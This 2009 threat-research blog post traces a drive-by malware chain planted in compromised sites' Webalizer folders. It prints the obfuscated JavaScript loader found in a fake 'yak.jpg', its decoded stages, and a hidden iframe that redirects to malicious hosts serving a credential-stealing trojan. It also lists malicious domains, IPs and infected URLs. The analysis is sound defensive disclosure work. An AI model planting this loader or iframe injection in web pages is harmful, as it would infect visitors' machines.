Blog for hpHosts, and whatever else I feel like writing about ....

Sunday 16 August 2009

Google: Webalizer exploits gone wild!

Okay, so the title may be wierd, but it sounded good and a little appropriate given both are involved (albeit one indirectly). I came across these whilst researching something else, and thought I'd give it a mention.

In short, as shown in the screenshot, these show a slew of sites that appear to have had Webalizer exploited, with some lovely little exploits put on the sites for unwitting victims that happen to visit. Chances are these will possibly load on the sites themselves, regardless of the URL used, if Webalizer files are referenced, but that's pure speculation as I've not checked.

When visiting one of the sites, for example;

dreisbachmotors.com/webalizer/050709wareza/index.html

You see (if you look at the source code), a .js file (images/counter.js) being loaded;


Ref: http://vurl.mysteryfcm.co.uk/?url=813701
Cache (PDF): http://hosts-file.net/misc/dreisbachmotors_com/dreisbachmotors_com.pdf



counter.js then goes on to load yet another site, this time autosloansonlines.com (IP: 89.149.242.190 - php6.nasza-klasa.pl, NetDirekt - AS28753). This then loads yet another site for us;



http://vurl.mysteryfcm.co.uk/?url=813731

The site loaded, 3gp-blogline.com (IP: 89.149.242.190 - php6.nasza-klasa.pl), then goes on to load yak.jpg at autoloansonlines.com, which you've no doubt guessed, isn't a jpg at all, but more Javascript;

a=new Array(3600,13225,9801,12996,11025,12544,13456,
3844,13924,9409,12996,1024,13225,12321,13689,12996,
9801,10201,1024,3721,1156,3721,11236,10609,13225,9604,
12100,10404,1089,13456,13225,10000,3844,1225,11025,13689,
13689,12769,3481,2304,2304,2704,10816,12769,2116,9801,11881,
12544,10816,11881,11236,12321,10404,2209,10000,12544,12100,
2304,2809,2401,2704,2304,11236,12321,2209,10000,10816,11236,
4096,2601,2401,1225,1089,14400,11236,10201,13689,11025,3844,
2500,2401,1089,11025,10404,11236,10816,11025,13689,3844,2500,
2500,2601,1089,13456,13689,14884,11881,10404,3844,1225,14161,
11236,13456,11236,9801,11236,11881,11236,13689,14884,3481,1089,
11025,11236,10201,10201,10404,12321,1225,3969,3721,2304,11236,
10609,13225,9604,12100,10404,3969,1156,3481,1024,13924,9409,12996,
1024,12996,10201,13225,13689,11664,13456,1024,3721,1024,1156,1156,
3481,1024,169,100,10404,12321,12996,1600,13924,9409,12996,1024,
11025,3721,2304,3481,11025,3600,13225,12321,13689,12996,9801,10201,
2116,11664,10201,12100,10609,13456,10816,3481,11025,1849,1849,1681,
1024,12996,10201,13225,13689,11664,13456,1849,3721,6889,13456,12996,
11025,12100,10609,2116,10404,12996,12321,11881,4489,10816,9409,
12996,4489,12321,10000,10201,1600,13225,12321,13689,12996,9801,
10201,2116,9801,10816,9409,12996,4489,12321,10000,10201,4225,13456,
1600,11025,1681,2025,2401,1681,3481,1024,169,100,10000,12321,9801,
13689,11881,10201,12100,13456,2116,14161,12996,11025,13456,10201,
1600,12996,10201,13225,13689,11664,13456,1681,3481,1024,3600,2209,
13225,9801,12996,11025,12544,13456,3844);for(var p in a){document.write(String.fromCharCode(Math.sqrt(a[p])));};


Which decodes to;

<script>var source ="=jgsbnf!tsd>#iuuq;004hq.cmphmjof/dpn05140jo/dhj@31#!xjeui>21!ifjhiu>223!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";

for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);

document.write(result); </script>


Which decodes to;

<iframe src="http://3gp-blogline.com/403/in.cgi?20" width=10 height=112 style="visibility: hidden"></iframe>


This then redirects to;

extex-events.ru/temp/ (IP: 80.90.114.11, SmartLogic Ltd., Russia)

In this particular case, it didn't seem to go any further. However, checking one of the others, led me through;

jkk.tw/in.cgi?5¶meter=jkk (IP: 213.163.84.28, Serverboost IP space)
rmi.tw/in.cgi?6 (IP: 213.163.84.28, Serverboost IP space)
blt.kz/1/show.php?s=5015ba5606 (IP: 213.163.84.28, Serverboost IP space)
blt.kz/1/url=about:blank (IP: 213.163.84.28, Serverboost IP space)



This decodes to;



A more readable version of the decoded JS is available at (couldn't post it here obviously as it would send the AV's flying):
http://wepawet.cs.ucsb.edu/view.php?hash=044a1831bdc8b81eae428c16fb3123b0&type=js

Which serves up the payload (in this case a credential stealing trojan - how nice!) from;

blt.kz/1/load.php?e=6
VT: http://www.virustotal.com/analisis/0b119b14f5acc63cd18a42b64b4c88da27c70af1e8c4af3dd8322228854fe872-1250346350
TE: http://www.threatexpert.com/report.aspx?md5=3ff5ae22e70e8d26923fda7ad3a9e46d

If you've already been to the above, you're either served up the fake 404 without the additional exploit code, or, it redirects to the following, which sadly 404s for me;

online358.net/work/show.php (IP: 195.88.190.240 Bigness group Ltd. Network, Russia)

Affected sites as currently listed in Google;

lappedilla.no/webalizer/050709wareza/crack=45=keygen=serial.html
actionitems.itone.net/webalizer/.../download=crack=view=19=keygen.html
georgelwilliams.com/webalizer/.../crack=41=keygen=serial.html
greenenergy.com.pe/webalizer/.../crack=7=keygen=serial.html
maemaematernity.com/webalizer/.../crack=1=keygen=serial.html
eco-gen.com/webalizer/050709wareza/crack=16=keygen=serial.html
mahdilib.ir/webalizer/.../crack=8=keygen=serial.html
americanmatrubber.com/webalizer/.../crack=5=keygen=serial.html
greystoneloan.com/webalizer/.../crack=40=keygen=serial.html
navast.com/webalizer/.../crack=58=keygen=serial.html
bsatroop91.org/webalizer/050709wareza/crack=4=keygen=serial.html
crazyhorsetoo.com/webalizer/.../crack=66=keygen=serial.html
dowa-tht.com/webalizer/050709wareza/crack=23=keygen=serial.html
garber-properties.com/webalizer/.../crack=12=keygen=serial.html
dirrtyhairy.com/webalizer/.../crack=35=keygen=serial.html
vancityweddings.com/webalizer/.../crack=25=keygen=serial.html
brighidswell.info/webalizer/.../download=crack=view=10=keygen.html
sygy.org/webalizer/050709wareza/crack=8=keygen=serial.html
irusniroo.com/webalizer/.../crack=11=keygen=serial.html
dreisbachmotors.com/webalizer/050709wareza/index.html
gameophilia.net/webalizer/.../crack=2=keygen=serial.html
gameophilia.net/webalizer/.../crack=63=keygen=serial.html
tiemphong.com/webalizer/.../crack=45=keygen=serial.html
matthewscraftsunique.com/webalizer/.../crack=53=keygen=serial.html
explorerecuador.com/webalizer/.../crack=3=keygen=serial.html
explorerecuador.com/webalizer/.../crack=22=keygen=serial.html
darwebhosting.com/webalizer/.../crack=7=keygen=serial.html
contactchange.com/webalizer/.../crack=10=keygen=serial.html
darbutterfly.com/webalizer/.../crack=35=keygen=serial.html
consulatebrazil.com/webalizer/.../crack=32=keygen=serial.html


Ref:
http://hosts-file.net/misc/hpObserver_-_Webalizer_exploits.html

No comments: